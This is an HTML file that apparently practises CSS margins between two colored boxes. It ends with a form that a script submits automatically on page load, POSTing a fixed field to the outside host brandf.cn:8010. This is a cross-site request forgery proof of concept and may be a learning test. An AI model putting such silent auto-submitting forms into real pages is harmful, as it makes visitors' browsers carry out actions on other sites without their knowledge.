<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <style type="text/css">
        .father {
            overflow: hidden;
            background-color: #424242;
        }

        .box2 {
            width: 50px;
            height: 50px;
            margin-bottom: 30px;
            background-color: #424242;
            /* display: inline-block; */
        }

        .box3 {
            margin-top: 40px;
            background-color: green;
            width: 50px;
            height: 50px;
        }
    </style>
</head>

<body>
    <div class="box2"></div>
    <div class="box3"></div>
    <!-- https://www.cnblogs.com/xieze/p/7995156.html -->
    <form action=http://www.brandf.cn:8010/article method=POST>
        <input type="text" name="xx" value="11" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>

</html>